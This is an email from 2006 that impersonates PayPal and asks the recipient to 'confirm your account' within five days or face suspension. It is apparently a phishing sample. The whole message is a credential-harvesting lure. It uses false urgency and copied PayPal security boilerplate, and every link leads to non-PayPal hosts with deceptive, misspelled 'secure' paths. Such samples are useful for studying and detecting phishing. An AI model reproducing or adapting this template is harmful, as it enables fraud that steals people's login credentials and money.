Subject: Receipt of payement to [email-masked]

From: PayPal <[email-masked]>
Date: Fri, 18 Aug 2006 07:43:34 +0300

[1]PayPal Header 

   Notice of Account Review Necessity

      Read this notice thoroughly and follow the instructions.
     _________________________________________________________________

   Why did I get the notice?
   You  have been sent this notice because the records of PayPal database
   indicate  you are a current or former PayPal account holder. PayPal is
   conducting  a  periodic  update of the database record. To ensure your
   account's  security,  it  is  important  that  you provide us accurate
   information. Please take a moment to verify the information we have on file.
   This notice provides instructions on how to confirm your PayPal account.
     _________________________________________________________________

   What should I do now?

   We sincerely ask you, as a PayPal account holder, to login to your account
   and give us the necessary information. Complete the necessary verification
   tasks  within 5 days, or your account might get temporarily suspended.
   Proceed with the link below.

                   [2]Click here to confirm your account
     _________________________________________________________________

   We apologize for your inconvenience.

   Thank you for your support,
   PayPal Accounts Department
     _________________________________________________________________

   Please do not reply to this email. Anything you send to this address cannot
   be answered. For assistance, [3]login to your PayPal account and choose the
   "Help" link in the footer of any page.
   To receive email notifications in plain text instead of HTML, update your
   preferences [4]here.
   PayPal Email ID PP571

   Protect Your Account Info
   Make sure you never provide your password to fraudulent websites.
   To safely and securely access the PayPal website or your account, open a new
   web browser and type in the PayPal URL to be sure you are on the real PayPal
   site.
   For more information on protecting yourself from fraud, please review our
      [5]Security Tips
   Protect Your Password
   You should never give your PayPal password to anyone, including PayPal
      employees.

References

   1. http://www.dctd.cerist.dz/us/paypal.com-redir/secure/ssl/webscr/sslsigninusing128bit.a541t125t541b1212.payapl.secureauthenticantion.userid1151354435sessionencrypt283bits/index.php
   2. http://asdtools.st/paypal/index.php
   3. http://asdtools.st/paypal/index.php
   4. http://asdtools.st/paypal/index.php
   5. http://asdtools.st/paypal/index.php